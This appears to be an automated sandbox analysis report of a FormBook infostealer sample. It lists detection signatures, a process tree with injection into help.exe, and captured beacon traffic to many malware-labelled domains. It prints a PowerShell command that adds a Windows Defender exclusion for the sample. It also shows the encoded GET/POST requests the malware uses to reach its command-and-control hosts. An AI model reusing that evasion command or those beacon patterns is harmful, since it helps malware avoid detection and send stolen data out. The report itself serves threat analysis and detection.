Windows Analysis Report
Zjf9D3oDifslon7.bat.exe

Overview

General Information

Sample name: Zjf9D3oDifslon7.bat.exe
Analysis ID: 1633494
MD5: c959a11f044fb4eb38f4ec1306bc432e
SHA1: a84e4b5e2a86f777afa70420b35c8b423307c264
SHA256: ce0656d79699a86c7a59333646e0248408e03e9b8e157289fb8e04e520a251c3
Tags: exeuser-adrian__luca
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Zjf9D3oDifslon7.bat.exe (PID: 5628 cmdline: "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe" MD5: C959A11F044FB4EB38F4EC1306BC432E)
    • powershell.exe (PID: 4144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7296 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • Zjf9D3oDifslon7.bat.exe (PID: 3736 cmdline: "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe" MD5: C959A11F044FB4EB38F4EC1306BC432E)
      • nS7xrGJCV5KYH1dhdb.exe (PID: 4908 cmdline: "C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\vr8pkxsoHYH.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • help.exe (PID: 7660 cmdline: "C:\Windows\SysWOW64\help.exe" MD5: DD40774E56D4C44B81F2DFA059285E75)
          • nS7xrGJCV5KYH1dhdb.exe (PID: 708 cmdline: "C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\cQzrcWPiGoM.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7880 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.1425567653.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3723926592.00000000032C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3723986742.0000000003310000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3721644285.0000000002B40000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.1513121982.00000000070B0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
5.2.Zjf9D3oDifslon7.bat.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.Zjf9D3oDifslon7.bat.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", ParentImage: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe, ParentProcessId: 5628, ParentProcessName: Zjf9D3oDifslon7.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", ProcessId: 4144, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", ParentImage: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe, ParentProcessId: 5628, ParentProcessName: Zjf9D3oDifslon7.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe", ProcessId: 4144, ProcessName: powershell.exe
                No Suricata rule has matched

                AV Detection

                Source: Zjf9D3oDifslon7.bat.exe, Avira: detected
                Source: http://www.warc.tech/eorp/?gN08=P1vvy/dPuZySW3ie6ImYQdSdkyzuTqB9P8sDpu7iGqDyRNA9IK9U6gn9swRUfjIPt0F9LM8PGucdQdBcQwfE88Fv4nukOvIqLad/EovZRIL3wftBPJ/RkKqYLxwUCYJbEAB5c18=&pV=72RL76oH, Avira URL Cloud: Label: malware
                Source: http://www.9c555697-d77.cfd/amnq/?gN08=JIexyz33k5t71XYT4BgoovbcOUCpfAuBWehOSL56f6eEWDxaBpIRc089zthz9wojunS1s3EaCRp6ZcIdmO3fX9kEaM12Et8jJTr2mMILOW6QCAyYh/xmDseHoWW+VL0/cDZ3IOU=&pV=72RL76oH, Avira URL Cloud: Label: malware
                Source: http://www.urbagan.net, Avira URL Cloud: Label: malware
                Source: http://www.9c555697-d77.cfd/amnq/, Avira URL Cloud: Label: malware
                Source: http://www.urbagan.net/yas3/, Avira URL Cloud: Label: malware
                Source: http://www.dresses-executive.sbs/iz5a/, Avira URL Cloud: Label: malware
                Source: http://www.dresses-executive.sbs/iz5a/?gN08=pCvqmtlE75lEZJwOi03uGzDLbgcrrnG1Tr2tBLLNc3COwvxFaBgW5yh1DMB07sKYTi7jZyf5CKVmTJZJbtCzngVqzEyQfibiUBY4ZKHOA094TeMtDRNwzn40Y7CPVzx32CctPmQ=&pV=72RL76oH, Avira URL Cloud: Label: malware
                Source: http://www.warc.tech/eorp/, Avira URL Cloud: Label: malware
                Source: Zjf9D3oDifslon7.bat.exe, Virustotal: Detection: 50%
                Source: Zjf9D3oDifslon7.bat.exe, ReversingLabs: Detection: 47%
                Source: Yara matchFile source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1425567653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3723926592.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3723986742.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3721644285.0000000002B40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1513121982.00000000070B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3726633182.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3723823865.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1427356722.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Zjf9D3oDifslon7.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Zjf9D3oDifslon7.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: iWNI.pdb source: Zjf9D3oDifslon7.bat.exe
                Source: Binary string: wntdll.pdbUGP source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1426102978.0000000001810000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724128272.0000000003440000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1427785390.0000000003298000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1425876319.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724128272.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Zjf9D3oDifslon7.bat.exe, Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1426102978.0000000001810000.00000040.00001000.00020000.00000000.sdmp, help.exe, help.exe, 0000000C.00000002.3724128272.0000000003440000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1427785390.0000000003298000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1425876319.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724128272.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: iWNI.pdbSHA256 source: Zjf9D3oDifslon7.bat.exe
                Source: Binary string: help.pdbGCTL source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1425850688.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3723057357.000000000095E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: help.pdb source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1425850688.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3723057357.000000000095E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3722689846.000000000085F000.00000002.00000001.01000000.0000000A.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3722822138.000000000085F000.00000002.00000001.01000000.0000000A.sdmp
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B5C3D0 FindFirstFileW,FindNextFileW,FindClose,12_2_02B5C3D0
                Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then xor eax, eax12_2_02B49E10
                Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi12_2_02B4E064
                Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then mov ebx, 00000004h12_2_037904F8

                Networking

                Source: DNS query: www.quantumxr.xyz
                Source: DNS query: www.lingkungan.xyz
                Source: DNS query: www.031235045.xyz
                Source: DNS query: www.bigjoy.xyz
                Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
                Source: Joe Sandbox ViewIP Address: 77.222.42.122 77.222.42.122
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /s7xs/?pV=72RL76oH&gN08=xcMJ8dHCBqmRN/v8A9X3SQFFEvK7hDYfq5HSOXvlsOwc7SqmLqODR0c7NEVchTWYh0j1Mb1wg8ygaKr+DeyKnNHuLw8PpkV609o2sUdqNXuPrOVuuXILkYLd4rwXbUWp6Pe3dUM= HTTP/1.1Host: www.paoginbcn.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /bd6u/?gN08=C699ZhSusvxhZ79sGIyx/jAntutNR/TTEg+UR4pbUkUSuK2bkyYOQkP8ElyXgHmB/M1sj/T1LBz/t4SesGYN4wrWcYFx/5ot68zGBTYlnDCNodr/RHqc1yG4bl8DqhV5GYXCq8Y=&pV=72RL76oH HTTP/1.1Host: www.quantumxr.xyzAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /amnq/?gN08=JIexyz33k5t71XYT4BgoovbcOUCpfAuBWehOSL56f6eEWDxaBpIRc089zthz9wojunS1s3EaCRp6ZcIdmO3fX9kEaM12Et8jJTr2mMILOW6QCAyYh/xmDseHoWW+VL0/cDZ3IOU=&pV=72RL76oH HTTP/1.1Host: www.9c555697-d77.cfdAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /ra8c/?gN08=FCJW9xjil5qugBSRiQA6TYMmKzFBES9fh1uxvnoCRwKx+kuUdPq0TiEctR6JEKFXsUKvjlQG/5hIwT1d+q0j/1iCU9EUYGPtluDYV9c/WeuHT7HzSozXeQyK+r9G2hUiOZ5RK/g=&pV=72RL76oH HTTP/1.1Host: www.thefounder.ceoAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /1vho/?pV=72RL76oH&gN08=HV0qpqyBt23es1JBKeA8Pyq95JhrjRymCCUWzkfvasXJsLYYlT2qpBshMc8nq0AWHyw4B9H3kdbdE1jmU/iMWQZhSKFgyEuJs5hCmkO4WxGTnVPOEQP+gLUT4VDuutPsgTWBpFU= HTTP/1.1Host: www.lingkungan.xyzAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /hb3t/?gN08=9KXb6qBxMll9f4x2p0s5tKTO97R+nUCdHsPBbbY6H5bX94ZOqhaq0szPM69Abc7OasYSx8zxfbGo3o80iaP4eapxmm2jqHmW9CxznwVLPhcW0VphUWXVjPpjgBZwM69FQ8Im0Qg=&pV=72RL76oH HTTP/1.1Host: www.nexstep.liveAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /tjx1/?gN08=TG2MQl+RzAjlK5FmB4vIzhZYom3se92/rpfSq0JUGMuU4ShRAQPdpLxTTwO0YSgd+qc50+/9J/dCy7dn7Bv3GHN+Sc3ELL+Y+schAQ9wC9Y5N/FY45eRx/Sf/SqUPO2TUMAOJOo=&pV=72RL76oH HTTP/1.1Host: www.031235045.xyzAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /freb/?gN08=CrVXR/tglfI2Tw26jNQpKKBtePCBpzNCR35NxdnTgAeIWyg43F22Hb45FwdJBD3fE3YCNnYYiArhrGggW044LgJePUXvimrIodKv/QpDNYxCPlVCAbLxc6DBc0KHQXoGeWWvXiA=&pV=72RL76oH HTTP/1.1Host: www.truay.siteAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /0zpa/?gN08=Arj7slIyYHdYIdItBvD/yug6zK1ulobzsX4Q/fC0Gb6wamVG7muUcu/e1DE+A+CXMGlNeQBc70XQmb9DcRsonO/yzonIKhXkXyWlnR1ezuUw/P1VmyAMkvhubLZRnfz8qNDWsf0=&pV=72RL76oH HTTP/1.1Host: www.playav.mobiAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /eorp/?gN08=P1vvy/dPuZySW3ie6ImYQdSdkyzuTqB9P8sDpu7iGqDyRNA9IK9U6gn9swRUfjIPt0F9LM8PGucdQdBcQwfE88Fv4nukOvIqLad/EovZRIL3wftBPJ/RkKqYLxwUCYJbEAB5c18=&pV=72RL76oH HTTP/1.1Host: www.warc.techAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /mik0/?gN08=MZodc8OlGt8s8YeqJAB5YyMn8PO8JKHrs5+7JFO7C2wIMEQuo0OiAGAhRRReq0xMS+0PcdUJklm1hYNxl2dPE9jey0yA/LIDuPPronUbycAnQT+gp2u2JsbLD0HUuGvMOevlVpE=&pV=72RL76oH HTTP/1.1Host: www.448828.partyAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /iz5a/?gN08=pCvqmtlE75lEZJwOi03uGzDLbgcrrnG1Tr2tBLLNc3COwvxFaBgW5yh1DMB07sKYTi7jZyf5CKVmTJZJbtCzngVqzEyQfibiUBY4ZKHOA094TeMtDRNwzn40Y7CPVzx32CctPmQ=&pV=72RL76oH HTTP/1.1Host: www.dresses-executive.sbsAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /7ao9/?gN08=0FCTgvFtttb/k3M7HElyhfE+VLi2VS+ZsM+qrGqWDjjgnBB1I9XqVJ2YzS96KRFB5ygIP+7H9rFjKFpZ8FUygo4h5wHS8QBwi4oSOvk4hrxITHeS+0VRJ/6NPUebi11PWq1CMfk=&pV=72RL76oH HTTP/1.1Host: www.bigjoy.xyzAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /vrgg/?gN08=0tsLL7PeGZ+MuFGr0RKEmyjy7iCQkNx0y+nhDKeS4rHoxyWsWUYtFIECofPisLkh7nEPrXMRdcFp7EDKjYXYHVCBDAfdhlQVF/DjaqRmnpXg6erSAq80yhVbSABIsdDrGDG/05Y=&pV=72RL76oH HTTP/1.1Host: www.klass.teamAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /1hc0/?gN08=qe5zJE97Y1Od+1YRU3JU1DJQ64YgQhmRIfUAmxXzD+vXbpn92cvHcFVamkgodqv0YEztxSYAbCj5dzR2TtR9T0MegKlWN5QKb4OsD7JjjXEag8dKVZvkZ7teEI5k/HsdiouyGcY=&pV=72RL76oH HTTP/1.1Host: www.calimade.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: global trafficHTTP traffic detected: GET /yas3/?gN08=ACLzix20cds7up7/46wlnsk6Nsv7Q3fKxrYR6p4MvFRMrxvnqM2s8zT2fyP6MdeU99jzpRbWnk1TsskmEkSk+j1LVAgmvtiWZg0TZwKxPIDcWqBYoWhVQhoyMquNLa7w3FwOYUE=&pV=72RL76oH HTTP/1.1Host: www.urbagan.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
                Source: unknownHTTP traffic detected: POST /bd6u/ HTTP/1.1Host: www.quantumxr.xyzAccept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://www.quantumxr.xyzReferer: http://www.quantumxr.xyz/bd6u/Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 209User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50Data Raw: 67 4e 30 38 3d 50 34 56 64 61 58 69 6a 68 4b 55 4f 63 65 55 4d 58 70 37 44 37 43 70 6e 34 2b 78 65 51 71 2f 34 43 78 57 51 58 75 74 65 4c 33 6b 66 75 66 71 39 6e 51 46 64 4a 30 76 32 48 31 65 42 6f 47 4b 51 68 4f 52 6a 6a 4e 57 58 4e 6d 7a 38 67 70 6a 48 72 45 30 51 39 58 48 4b 62 59 30 76 30 75 67 4e 6d 2b 43 66 42 7a 77 4e 2b 41 79 4a 33 59 33 54 54 42 57 4e 37 67 32 4e 4b 56 38 72 74 43 6f 76 58 76 36 39 73 73 69 4c 50 49 36 72 63 6d 6a 45 39 2b 73 4e 50 35 2b 64 46 5a 73 41 72 69 75 59 69 46 76 71 5a 4b 35 76 33 39 6a 73 7a 71 7a 4b 55 62 66 6e 70 66 53 6b 4d 57 72 74 4a 57 78 72 36 50 32 77 48 65 39 51 38 6b 45 54 Data Ascii: gN08=P4VdaXijhKUOceUMXp7D7Cpn4+xeQq/4CxWQXuteL3kfufq9nQFdJ0v2H1eBoGKQhORjjNWXNmz8gpjHrE0Q9XHKbY0v0ugNm+CfBzwN+AyJ3Y3TTBWN7g2NKV8rtCovXv69ssiLPI6rcmjE9+sNP5+dFZsAriuYiFvqZK5v39jszqzKUbfnpfSkMWrtJWxr6P2wHe9Q8kET
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 10 Mar 2025 11:29:13 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 10 Mar 2025 11:29:15 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
